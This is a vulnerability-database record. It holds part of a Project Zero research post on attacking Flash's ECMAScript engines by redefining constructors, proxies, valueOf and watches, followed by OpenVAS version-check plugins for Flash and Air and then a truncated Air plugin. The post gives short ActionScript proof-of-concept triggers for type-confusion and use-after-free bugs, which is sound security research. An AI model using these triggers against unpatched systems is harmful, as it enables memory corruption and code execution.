flash.filters.BlurFilter(100, 15, 5555);\n\nthis.filters = [blur]; //this is a Button\n\nflash.filters.BlurFilter = flash.filters.ConvolutionFilter;\n\nvar f = this.filters;\n\nvar conv = f[0];\n\nconv.matrix = [0,1,1,1,1,1,1,1,1,1,1,1,1,1];\n\n \n\n\nThis is a simple type confusion issue. When the Button.filters method is set, it creates a native array containing all the filters and stores it. When the Button.filters property is read, it creates ActionScript objects of the type of each filter by calling its ActionScript constructor (with the assumption it hasn\u2019t been redefined) and then setting its native backing object to the one stored in the array. If the constructor for a filter is redefined, it calls the constructor for the wrong filter type, but still sets the same native object. This leads to an AS object of one type being backed by a native object of another type, leading to type confusion.\n\n## CVE-2015-0305\n\n \n\n\n[CVE-2015-0305](<https://code.google.com/p/google-security-research/issues/detail?id=150>) is another example of a type confusion issue that occurs through redefinition via equality. \n\n \n\n\nvar b = flash.net;\n\nb.FileReference = q;\n\nfunction q(){\n\nthis.f = flash.display.BitmapData\n\nvar c = new this.f(1000, 1000, true, 1000)\n\n}\n\nvar file = new FileReferenceList();\n\n\u2026\n\nfile.browse();\n\n \n\n\nIt is fairly similar to the previous case. When FileReferenceList.browse is called, the browser spawns a dialog and the user selects files. Then, for each file, the browse method calls the FileReference constructor and creates an object for each file. In this bug, the constructor is overwritten with a constructor that initializes it as a BitmapData object. When the constructor is called, its type is set to FileReference, even though it is not the type that is returned. This leads to an object with an AS object type and native object type that are inconsistent, and therefore type confusion. The bug is that FileReferenceList.browse assumes the FileReference constructor will return a FileReference, even though this isn\u2019t guaranteed because the method can be redefined.\n\n# Proxy Objects\n\n \n\n\nProxy objects can be used in the place of regular objects. They allow functions that handle every property access and method call to be defined. They can sometimes be used to redefine a property where equality fails. They also have the benefit of being able to execute code every time a property is accessed, which can allow behaviour which isn\u2019t possibly when simply setting a property, such as returning a different value each time a property is accessed. ActionScript 3 and JavaScript support Proxy objects.\n\n## CVE-2015-0327\n\n \n\n\n[CVE-2015-0327](<https://code.google.com/p/google-security-research/issues/detail?id=223&can=1&q=stringify>) is an issue found by Ian Beer that can be triggered by calling the stringify method in AS3 on a Proxy object. \n\n \n\n\nwhile (index != 0) {\n\nownDynPropCount++;\n\nindex = value-&gt;nextNameIndex(index);\n\n}\n\n \n\n\nAutoDestructingAtomArray propNames(m_fixedmalloc, ownDynPropCount);\n\n\u2026 \n\nwhile (index != 0) {\n\nAtom name = value-&gt;nextName(index);\n\npropNames.m_atoms[propNamesIdx] = name;\n\npropNamesIdx++;\n\nindex = value-&gt;nextNameIndex(index);\n\n}\n\n \n\n\nThe code above is from the open-source AVM. It counts the elements in value, and then uses the length to allocate an array. The array is then set by enumerating the items in value. However, if value is a Proxy object, the number of elements in each enumeration is not necessarily consistent, which can lead to an overflow in the allocated buffer.\n\n# Conversion Operators\n\n \n\n\nConversion operators, such as toString, valueOf and toInt can often be called implicitly. For example, when calling a native method such as:\n\n \n\n\nvar b = new BitmapData(x, y, true, 0xff00ff);\n\n \n\n\nThis will usually call valueOf on x and y to convert them to integers if they are not already. Functions that take string input often display similar behavior with toString. This can be an avenue for executing scripts at unexpected times. Conversion operators can be redefined in both AS2 and AS3.\n\n## CVE-2015-3039\n\n \n\n\n[CVE-2015-3039](<https://code.google.com/p/google-security-research/issues/detail?id=244>) is a bug in AS2 where calls to conversion operator allows script to be executed unexpectedly during a native call.\n\n \n\n\nvar filter = new ConvolutionFilter(...);\n\nvar n = {};\n\nn.valueOf = ts;\n\nvar a = [];\n\nfor(var k = 0; k &lt; 1; k++){\n\na[k] = n;\n\n}\n\nfilter.matrix = a;\n\nfunction ts(){\n\nfilter.matrix = a;\n\n}\n\n \n\n\nWhen the native matrix getter is called, it first deletes the existing matrix, then reallocates a new one and then sets its contents to the values in the provided matrix. When it fetches the values from the matrix, it calls valueOf to convert the contents of the array to members of the Number class. However, if the valueOf function also calls the matrix getter, it will delete the matrix array, and reallocate it, even though the previous call isn\u2019t complete, and will write to it after the second call returns. This leads to a use-after-free bug. \n\n \n\n\nCVE-2015-5119\n\n \n\n\n[CVE-2015-5119](<https://code.google.com/p/google-security-research/issues/detail?id=472>) is a bug discovered in the HackingTeam leaks which occurs because calls to a conversion operator can cause a buffer to be freed and reallocated before a write to the original buffer.\n\n \n\n\nvar b = new ByteArray();\n\nb.length = 12;\n\nvar n = new myba(b);\n\nb[0] = n;\n\n \n\n\nIn the myba class definition:\n\n \n\n\nprototype.valueOf = function()\n\n{\n\nb.length = 1000;\n\n}\n\n \n\n\nThis bug is in the AS3 interpreter unlike the AS2 interpreter for the issue above, so valueOf has to be redefined in a class definition as shown. The vulnerable code is part of the open source AVM, and is as follows:\n\n \n\n\nvoid ByteArrayObject::setUintProperty(uint32_t i, Atom value)\n\n{\n\nm_byteArray[i] = uint8_t(AvmCore::integer(value));\n\n}\n\n \n\n\nThe AvmCore::integer method calls the valueOf method defined for the object value, which corresponds to the variable n in the ActionScript above. This can then set the length of the byte array, which can cause it to be reallocated. However, the write occurs on the original buffer, leading to a use-after-free.\n\n# Watches\n\n \n\n\nWatches are another method that can be used to change a property of an object. They are supported generically in AS2 and JavaScript. Watches trigger whenever an object property without a custom setter is set. This can sometimes mean that when a native method sets a property, a watch will trigger, allowing a jump into script, and also the ability to change what the property is set to, as a watcher can return a value which supersedes the value that the caller is trying to set the watched field to.\n\n## CVE-2015-3120\n\n \n\n\n[CVE-2015-3120](<https://code.google.com/p/google-security-research/issues/detail?id=337>) is a type confusion issue that can be reached by setting a watch on a variable.\n\n \n\n\nvar fileRef:FileReferenceList = new FileReferenceList();\n\nfileRef.addListener(listener);\n\nfileRef[\"fileList\"] = \"asdf\";\n\nfileRef.watch(\"fileList\", func);\n\nfileRef.browse(allTypes);\n\n \n\n\nfunction func(){\n\nreturn 7777777;\n\n}\n\n \n\n\nSetting a watch on the variable fileList causes the function func to be triggered when the native browse function creates the fileList object and attempts to set it. The function then returns the value 7777777, which is a Number, replacing the object that is set. This leads to type confusion when the variable is used, assumed to be an ActionScript object and used as a pointer as opposed to a Number.\n\n## CVE-2015-3119\n\n \n\n\n[CVE-2015-3119](<https://code.google.com/p/google-security-research/issues/detail?id=336>) is a bug in AS2 that can be triggered by setting a watch on a variable:\n\n \n\n\nclass mysubclass extends NetConnection {\n\nfunction mysubclass(a){\n\nthis.uri = \"test\";\n\nsuper();\n\nthis.watch(\"uri\", func);\n\nvar n = {toString : func}\n\nvar s = super;\n\ntrace(y);\n\nthis.connect(y);\n\nvar f = ASnative(2101, 411); //setBufferTimeMax\n\nf.call(this, 1000);\n\nfunction func(a, b, c){\n\nvar f = ASnative(2101, 200); // newStream\n\nvar n = new NetConnection();\n\nn.connect(y);\n\nf(this, n);\n\n}\n\n}\n\n}\n\n \n\n\nA watch is set on the URL property of a NetConnection object, and when it attempts to set the URL, the function func is called. This function redefines the this object as a NetStream (as opposed to a NetConnection), which leads to type confusion. The watch makes this possible, as it occurs after type checking, otherwise the function would fail to execute if called as a NetStream.\n\n# Subclassing\n\n \n\n\nSometimes it is possible to redefine a method or property of a class by subclassing it, if you control the construction of the object. Classes in ActionScript and JavaScript can be subclassed using the extends keyword. In addition, classes can sometimes be dynamically extended using the __proto__ or prototype keyword.\n\n# Resolution Methods\n\n \n\n\nJavaScript and AS2 objects also support resolution methods. These are methods are called when resolution of a property or method fails, as a last resort. In ActionScript 2, __resolve is a resolution function that gets called if resolution of a property or method fails. In JavaScript, there are a series of __lookUp*__ methods, such as __lookUpGetter__ which serve the same purpose (the specific method that get calls depends exactly on what type of resolution fails). These functions can be used to redefine methods or properties to reach bugs, but are also useful in finding bugs. Calling a native method on an object with a resolution method set is a good way to figure out what properties of the object the method is accessing, which can then be modified further\n\n# Conclusion\n\nRedefining host methods and properties can often violate the assumptions made by ECMAScript VMs when they access them. This is a good avenue for finding bugs in this type of software. \n\n \n\n", "edition": 2, "cvss3": {}, "published": "2015-08-17T00:00:00", "type": "googleprojectzero", "title": "\nAttacking ECMAScript Engines with Redefinition\n", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0765", "CVE-2014-1705", "CVE-2014-8636", "CVE-2015-0305", "CVE-2015-0327", "CVE-2015-0349", "CVE-2015-3039", "CVE-2015-3077", "CVE-2015-3119", "CVE-2015-3120", "CVE-2015-5119", "CVE-2015-5122", "CVE-2015-5123"], "modified": "2015-08-17T00:00:00", "id": "GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806", "href": "https://googleprojectzero.blogspot.com/2015/08/attacking-ecmascript-engines-with.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-31T18:38:51", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-15T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for flash-player (SUSE-SU-2015:1211-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850845", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850845", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850845\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-15 12:12:54 +0200 (Thu, 15 Oct 2015)\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\",\n \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\",\n \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\",\n \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\",\n \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\",\n \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\",\n \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\",\n \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\",\n \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for flash-player (SUSE-SU-2015:1211-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'flash-player'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"flash-player was updated to fix 35 security issues.\n\n These security issues were fixed:\n\n - CVE-2015-3135, CVE-2015-4432, CVE-2015-5118: Heap buffer overflow\n vulnerabilities that could lead to code execution (bsc#937339).\n\n - CVE-2015-3117, CVE-2015-3123, CVE-2015-3130, CVE-2015-3133,\n CVE-2015-3134, CVE-2015-4431: Memory corruption vulnerabilities that\n could lead to code execution (bsc#937339).\n\n - CVE-2015-3126, CVE-2015-4429: Null pointer dereference issues\n (bsc#937339).\n\n - CVE-2015-3114: A security bypass vulnerability that could lead to\n information disclosure (bsc#937339).\n\n - CVE-2015-3119, CVE-2015-3120, CVE-2015-3121, CVE-2015-3122,\n CVE-2015-4433: Type confusion vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2015-3118, CVE-2015-3124, CVE-2015-5117, CVE-2015-3127,\n CVE-2015-3128, CVE-2015-3129, CVE-2015-3131, CVE-2015-3132,\n CVE-2015-3136, CVE-2015-3137, CVE-2015-4428, CVE-2015-4430,\n CVE-2015-5119: Use-after-free vulnerabilities that could lead to code\n execution (bsc#937339).\n\n - CVE-2014-0578, CVE-2015-3115, CVE-2015-3116, CVE-2015-3125,\n CVE-2015-5116: Vulnerabilities that could be exploited to bypass the\n same-origin-policy and lead to information disclosure (bsc#937339).\");\n\n script_tag(name:\"affected\", value:\"flash-player on SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2015:1211-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLED12\\.0SP0\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.481~93.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.481~93.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-07-19T22:13:24", "description": "This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "openvas", "title": "Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805904", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805904", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805904\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 75592);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-07-08 14:25:09 +0530 (Wed, 08 Jul 2015)\");\n script_name(\"Adobe Flash Player Use-After-Free Vulnerability July15 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash\n Player and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - An use-after-free error in 'ByteArray' class.\n\n - Multiple heap based buffer overflow errors.\n\n - Multiple memory corruption errors.\n\n - Multiple null pointer dereference errors.\n\n - Multiple unspecified errors.\n\n - A type confusion error.\n\n - Multiple use-after-free vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to gain access to potentially sensitive information, conduct denial\n of service attack and potentially execute arbitrary code in the context of the\n affected user.\");\n\n script_tag(name:\"affected\", value:\"Adobe Flash Player versions before\n 11.2.202.481 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Flash Player version\n 11.2.202.481 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/561288\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa15-03.html\");\n script_xref(name:\"URL\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-16.html\");\n script_xref(name:\"URL\", value:\"http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\n## Fix will be updated once the solution details are available\nif(version_is_less(version:playerVer, test_version:\"11.2.202.481\"))\n{\n report = 'Installed version: ' + playerVer + '\\n' +\n 'Fixed version: ' + \"11.2.202.481\" + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:00", "description": "Gentoo Linux Local Security Checks GLSA 201507-13", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201507-13", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3113", "CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121394", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201507-13.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121394\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:56 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201507-13\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201507-13\");\n script_cve_id(\"CVE-2014-0578\", \"CVE-2015-3113\", \"CVE-2015-3114\", \"CVE-2015-3115\", \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\", \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\", \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\", \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\", \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\", \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\", \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\", \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\", \"CVE-2015-5119\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201507-13\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 11.2.202.481\"), vulnerable: make_list(\"lt 11.2.202.481\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:52", "description": "This host is installed with Adobe Air and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-07-09T00:00:00", "type": "openvas", "title": "Adobe Air Multiple Vulnerabilities-01 July15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3132", "CVE-2015-3127", "CVE-2015-3114", "CVE-2015-3124", "CVE-2015-3136", "CVE-2015-3118", "CVE-2015-3122", "CVE-2015-4433", "CVE-2015-3134", "CVE-2015-3117", "CVE-2015-4430", "CVE-2015-3119", "CVE-2015-3126", "CVE-2015-3123", "CVE-2015-4431", "CVE-2015-5119", "CVE-2014-0578", "CVE-2015-3116", "CVE-2015-3120", "CVE-2015-3121", "CVE-2015-3130", "CVE-2015-3115", "CVE-2015-3137", "CVE-2015-3129", "CVE-2015-5116", "CVE-2015-3135", "CVE-2015-3131", "CVE-2015-4432", "CVE-2015-5117", "CVE-2015-3128", "CVE-2015-4429", "CVE-2015-4428", "CVE-2015-3125", "CVE-2015-3133", "CVE-2015-5118"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805911", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805911", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_air_mult_vuln01_jul15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# Adobe Air Multiple Vulnerabilities-01 July15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:adobe_air\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805911\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2015-5119\", \"CVE-2014-0578\", \"CVE-2015-3114\", \"CVE-2015-3115\",\n \"CVE-2015-3116\", \"CVE-2015-3117\", \"CVE-2015-3118\", \"CVE-2015-3119\",\n \"CVE-2015-3120\", \"CVE-2015-3121\", \"CVE-2015-3122\", \"CVE-2015-3123\",\n \"CVE-2015-3124\", \"CVE-2015-3125\", \"CVE-2015-3126\", \"CVE-2015-3127\",\n \"CVE-2015-3128\", \"CVE-2015-3129\", \"CVE-2015-3130\", \"CVE-2015-3131\",\n \"CVE-2015-3132\", \"CVE-2015-3133\", \"CVE-2015-3134\", \"CVE-2015-3135\",\n \"CVE-2015-3136\", \"CVE-2015-3137\", \"CVE-2015-4428\", \"CVE-2015-4429\",\n \"CVE-2015-4430\", \"CVE-2015-4431\", \"CVE-2015-4432\", \"CVE-2015-4433\",\n \"CVE-2015-5116\", \"CVE-2015-5117\", \"CVE-2015-5118\");\n script_bugtraq_id(75568, 75594, 75593, 75591, 75590, 75595, 75596, 